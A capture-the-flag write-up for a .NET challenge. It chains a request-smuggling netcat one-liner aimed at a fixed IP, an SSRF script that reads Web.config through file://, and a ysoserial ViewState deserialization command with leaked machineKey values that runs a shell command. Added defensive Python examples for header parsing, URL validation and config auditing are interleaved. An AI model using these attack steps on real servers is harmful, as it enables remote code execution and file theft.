
C# Deserialization

Event Name: Backdoor CTF 2025
GitHub URL: -
Challenge Name: .net painwork
Attachments:
References:

Writeup

Step 1: Bypass the Reverse Proxy

First, we have to get past the reverse proxy by using the following script:

(printf "POST /login.aspx HTTP/1.1\r\n"\
"Host: 4.188.81.42\r\n"\
"Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:\r\n"\
"Content-Length: 32\r\n\r\n"; sleep 1;\
printf "GET /admin.aspx HTTP/1.1\r\n"\
"DUMMY:"; sleep 1; printf "GET / HTTP/1.1\r\n"\
"Host: 4.188.81.42\r\n\r\n") | nc 4.188.81.42 80
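A defender's view of Step 1, as an added example that is not part of the writeup: the request above places a header whose name runs to roughly 270 bytes ahead of the real Content-Length, and the bypass depends on the front end and the back end framing that request differently. A front end that parses strictly and refuses anything ambiguous or oversized, instead of forwarding it for the application server to interpret on its own, never lets such a request through. The size limits and the sample requests below are constructed for this example and are not the challenge's proxy configuration.

```python
import re

# Policy limits for this example (constructed; real proxies expose these as
# tunables such as per-header-line and per-header-name size caps).
MAX_HEADER_NAME_LEN = 128
MAX_HEADER_LINE_LEN = 8192

# RFC 9110 "token" characters, the only ones allowed in a field name.
TOKEN_RE = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def parse_request_head(raw: bytes):
    """Split a raw HTTP/1.1 request into (request_line, headers, body).

    headers is a list of (lowercased name, value) byte pairs. Anything that is
    not unambiguously well-formed raises ValueError: a front end that forwards
    such a request lets the back end make its own guess, which is exactly the
    disagreement a desync relies on.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.split(b"\r\n")
    request_line, headers = lines[0], []
    if len(request_line.split(b" ")) != 3:
        raise ValueError("malformed request line")
    for line in lines[1:]:
        if len(line) > MAX_HEADER_LINE_LEN:
            raise ValueError("header line too long")
        if line[:1] in (b" ", b"\t"):
            raise ValueError("obsolete line folding not accepted")
        name, colon, value = line.partition(b":")
        if not colon or not TOKEN_RE.match(name):
            raise ValueError("malformed header name")
        if len(name) > MAX_HEADER_NAME_LEN:
            raise ValueError("header name too long")
        headers.append((name.lower(), value.strip()))
    return request_line, headers, body


def check_framing(headers):
    """Reject message-length signals that two parsers could read differently."""
    cls = [v for n, v in headers if n == b"content-length"]
    tes = [v for n, v in headers if n == b"transfer-encoding"]
    if cls and tes:
        raise ValueError("Content-Length and Transfer-Encoding both present")
    if len(set(cls)) > 1:
        raise ValueError("conflicting Content-Length values")
    if any(not v.isdigit() for v in cls):
        raise ValueError("non-numeric Content-Length")
    if any(v.lower() != b"chunked" for v in tes):
        raise ValueError("unsupported Transfer-Encoding")


def gate(raw: bytes):
    """Return (accepted, reason) for a raw request, as a strict proxy would."""
    try:
        _, headers, _ = parse_request_head(raw)
        check_framing(headers)
    except ValueError as exc:
        return False, str(exc)
    return True, "ok"


# Constructed samples: a normal request, one shaped like Step 1 (a header
# name of several hundred bytes ahead of the real Content-Length), and a
# request with two disagreeing Content-Length headers.
BENIGN = (b"POST /login.aspx HTTP/1.1\r\nHost: example.invalid\r\n"
          b"Content-Length: 5\r\n\r\nhello")
OVERSIZED_NAME = b"Content-Length0" + b"a" * 255
DESYNC_SHAPED = (b"POST /login.aspx HTTP/1.1\r\nHost: example.invalid\r\n"
                 + OVERSIZED_NAME + b":\r\nContent-Length: 32\r\n\r\n"
                 b"GET /admin.aspx HTTP/1.1\r\nDUMMY:")
DOUBLE_CL = (b"POST / HTTP/1.1\r\nHost: example.invalid\r\n"
             b"Content-Length: 4\r\nContent-Length: 10\r\n\r\nabcd")

if __name__ == "__main__":
    for label, req in [("benign", BENIGN), ("step-1 shape", DESYNC_SHAPED),
                       ("double CL", DOUBLE_CL)]:
        print(f"{label:14} -> {gate(req)}")
```

Note that the Step 1 request carries only one real Content-Length header; what trips the gate is the header-name length cap, not a duplicate-length check, so a proxy that enforces framing rules alone would still need a sane size limit on individual field names.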

Step 2: Use Session ID and XSRF Token to Fetch Files

Get the SESSIONID and XSRF token and place them into the following script along with the URL you want to fetch.

import requests

HOST = "4.188.81.42"

SESSION_ID = ""
XSRF_TOKEN = ""
URL_VALUE = "file:///C:/inetpub/wwwroot/Web.config"

def main():
    url = f"http://{HOST}/health.ashx"

    headers = {
        "Host": HOST,
        "X-AntiXsrf": XSRF_TOKEN,
        "Accept-Language": "en-US,en;q=0.9",
        "User-Agent": (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/142.0.0.0 Safari/537.36"
        ),
        "Content-Type": "application/json",
        "Accept": "*/*",
        "Origin": f"http://{HOST}",
        "Referer": f"http://{HOST}/admin.aspx",
    }

    cookies = {
        "ASP.NET_SessionId": SESSION_ID,
        "__AntiXsrfToken": XSRF_TOKEN,
    }

    data = {"url": URL_VALUE}

    print("[+] Sending POST /health.ashx ...")
    response = requests.post(url, headers=headers, cookies=cookies, json=data)
    print("[+] Status:", response.status_code)
    print("[+] Response body:")
    print(response.text)

if __name__ == "__main__":
    main()
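Step 2 works because health.ashx fetches whatever url it is handed, file:// paths included. As an added example that is not from the writeup or the challenge code, the validator below shows the checks such an endpoint needs before it fetches anything: a scheme allowlist, no userinfo in the authority, a host allowlist, a port check and a resolved-address check. The allowlisted host, the policy constants and the fake resolver answers are constructed for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Example policy (constructed): the endpoint may only fetch http(s) URLs from
# an explicit host allowlist, on the default ports, resolving to public IPs.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"status.example.invalid"}
ALLOWED_PORTS = {None, 80, 443}


def default_resolve(host):
    """Resolve a host to its IP address strings with the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public(addr: str) -> bool:
    """True only for addresses outside private, loopback and reserved ranges."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_url(url: str, resolve=default_resolve):
    """Return (ok, reason) for a caller-supplied URL.

    `resolve` is injectable so the example runs offline. Production code
    should also connect to the address it validated instead of resolving
    again, otherwise a changing DNS answer can slip past the check.
    """
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on out-of-range ports
    except ValueError:
        return False, "unparseable URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '(none)'}"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host not in ALLOWED_HOSTS:
        return False, f"host not allowlisted: {host}"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    try:
        addrs = resolve(host)
    except OSError:
        return False, "host does not resolve"
    for addr in addrs:
        if not is_public(addr):
            return False, f"resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    fake_public = lambda host: ["1.2.3.4"]     # constructed resolver answer
    fake_internal = lambda host: ["10.0.0.5"]  # constructed resolver answer
    for url, resolver in [
        ("file:///C:/inetpub/wwwroot/Web.config", fake_public),
        ("http://127.0.0.1/health.ashx", fake_public),
        ("http://status.example.invalid@127.0.0.1/", fake_public),
        ("http://status.example.invalid/ping", fake_public),
        ("http://status.example.invalid/ping", fake_internal),
    ]:
        print(f"{url:45} -> {validate_fetch_url(url, resolve=resolver)}")
```

The allowlist is the control that matters; the resolution check is a second layer for when the allowlist has to be broader than a fixed set of names.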

Step 3: Generate a Payload with ysoserial

Extract the machineKey and use its values in the following ysoserial.exe command:

ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "dir C:\inetpub\wwwroot\ > C:\Windows\Temp\test.txt 2>&1" \
--path="/login.aspx" \
--apppath="/" \
--decryptionalg="AES" \
--decryptionkey="AB4298433692C6911B75665DEFA47AD09EA856BE41879334" \
--validationalg="SHA1" \
--validationkey="AC4DCFDDF3BB46EC1506BD671BEE55D5666B7B0B"

Step 4: Inject the Payload

Intercept the POST request to /login.aspx and place the generated payload into the __VIEWSTATE parameter.
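Steps 3 and 4 only work because the machineKey values read out of Web.config in Step 2 are exactly what ASP.NET uses to sign (and, if enabled, encrypt) __VIEWSTATE. As an added, defender's-side example that is not part of the writeup, the audit below reads the ViewState-related settings from a Web.config and flags the ones that make a leaked file fatal: clear-text static keys, a weak validation algorithm, a disabled ViewState MAC, and encryption not forced on. The two Web.config fragments and their key values are constructed placeholders, not the challenge's.

```python
import xml.etree.ElementTree as ET

# Constructed Web.config fragment mirroring the shape of a leaked one; the
# key values are placeholders, not real keys.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""

# Constructed hardened counterpart: auto-generated keys, HMACSHA256 MAC and
# ViewState encryption forced on.
HARDENED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
  </system.web>
</configuration>
"""

STRONG_VALIDATION = {"HMACSHA256", "HMACSHA384", "HMACSHA512"}
WEAK_DECRYPTION = {"DES", "3DES"}


def audit_viewstate_config(xml_text: str):
    """Return a list of (code, detail) findings for ViewState-related settings."""
    root = ET.fromstring(xml_text)
    findings = []
    mk = next(root.iter("machineKey"), None)
    pages = next(root.iter("pages"), None)

    # A missing <machineKey> means auto-generated keys, which is the safe
    # single-server default, so only an explicit element is inspected.
    if mk is not None:
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate,IsolateApps")
            if not value.upper().startswith("AUTOGENERATE"):
                findings.append((
                    "STATIC_" + attr.upper(),
                    f"{attr} is stored in clear text; anyone who can read "
                    "Web.config can produce ViewState the server accepts. "
                    "Encrypt the section (aspnet_regiis -pe) and restrict reads."))
        validation = mk.get("validation", "").upper()
        if validation and validation not in STRONG_VALIDATION:
            findings.append(("WEAK_VALIDATION",
                             f"validation={validation}; use HMACSHA256 or stronger"))
        decryption = mk.get("decryption", "").upper()
        if decryption in WEAK_DECRYPTION:
            findings.append(("WEAK_DECRYPTION",
                             f"decryption={decryption}; use AES"))

    if pages is not None and pages.get("enableViewStateMac", "true").lower() != "true":
        findings.append(("VIEWSTATE_MAC_OFF",
                         "enableViewStateMac=false; ViewState is deserialized "
                         "without any integrity check"))
    mode = pages.get("viewStateEncryptionMode", "Auto") if pages is not None else "Auto"
    if mode.lower() != "always":
        findings.append(("VIEWSTATE_UNENCRYPTED",
                         f"viewStateEncryptionMode={mode}; set Always so "
                         "serialized state is never sent in the clear"))
    return findings


if __name__ == "__main__":
    for label, cfg in [("leaked-style", SAMPLE_WEB_CONFIG),
                       ("hardened", HARDENED_WEB_CONFIG)]:
        print(f"== {label}")
        for code, detail in audit_viewstate_config(cfg) or [("OK", "no findings")]:
            print(f"  {code}: {detail}")
```

The audit cannot tell whether the keys have already been read by someone else; once Web.config has been exposed, as it was in Step 2, the only fix is to rotate the machineKey, and the decisive control is the one upstream, not letting an SSRF read the file at all.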


Step 5: Retrieve Command Output

Repeat Steps 1 and 2 to retrieve the contents of:

C:\Windows\Temp\test.txt

Step 6: Retrieve the Flag

Identify the flag file name and repeat Steps 1 and 2 again to retrieve the contents of the flag file.
